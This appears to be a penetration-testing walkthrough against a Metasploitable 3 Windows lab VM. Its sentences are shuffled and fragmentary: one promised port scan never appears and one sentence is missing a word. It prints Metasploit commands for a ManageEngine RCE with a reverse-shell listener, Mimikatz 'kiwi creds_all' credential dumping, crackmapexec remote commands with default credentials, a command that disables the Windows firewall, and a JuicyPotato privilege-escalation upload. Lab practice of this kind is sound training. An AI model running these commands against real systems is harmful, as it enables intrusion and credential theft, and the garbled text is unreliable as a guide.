We start with a quick Nmap scan to identify open ports and running services.
When applications load DLLs without specifying absolute paths, Windows searches for them in a specific order. An attacker with write access to a directory earlier in the search path can plant a malicious DLL that gets loaded by a privileged process.
Once you have the target IP, run a comprehensive port scan:
| Problem | Solution |
|---------|----------|
| VM won’t build | Use Hyper-V (not VirtualBox). Run `vagrant up --provider=hyperv` |
| EternalBlue crashes target | Increase GroomAllocations to 12, set VerifyTarget to false |
| Firewall blocks reverse shell | Inside VM: `netsh advfirewall set allprofiles state off` |
| Tomcat 404 after deploy | Ensure context path matches WAR filename. Use /shell as context. |
Use the exploit module designed for Jenkins script consoles:
Using the information gathered during the reconnaissance phase, we can now identify potential vulnerabilities in the system. One notable vulnerability is the SMB service, which is running on port 445. Metasploitable 3 Windows has a known vulnerability in the SMB service that can be exploited using the EternalBlue exploit.
```
meterpreter > ls
meterpreter > sysinfo
meterpreter > getuid
```
```
load kiwi
creds_all
```
```
msf6 > use exploit/windows/http/manageengine_desktop_central_rce
msf6 exploit(windows/http/manageengine_desktop_central_rce) > set RHOST 10.0.2.6
msf6 exploit(windows/http/manageengine_desktop_central_rce) > set LHOST 10.0.2.15
msf6 exploit(windows/http/manageengine_desktop_central_rce) > set LPORT 4444
msf6 exploit(windows/http/manageengine_desktop_central_rce) > run
```
The holy grail of Windows exploitation is the SAM database.
```
crackmapexec winrm 192.168.56.103 -u administrator -p vagrant -x "whoami"
```
Metasploitable 3 was designed to be built from source using Vagrant and Packer, but community tools have simplified the process significantly.
You might find your actual host machine.
The presence of WinRM (port 47001) and SMB signing disabled will be our eventual keys to the kingdom.
To make this walkthrough smooth, set both VMs to a (or a custom NAT network). This isolates the carnage from your physical router.
```
sessions
```
```
upload JuicyPotato.exe C:\temp\
```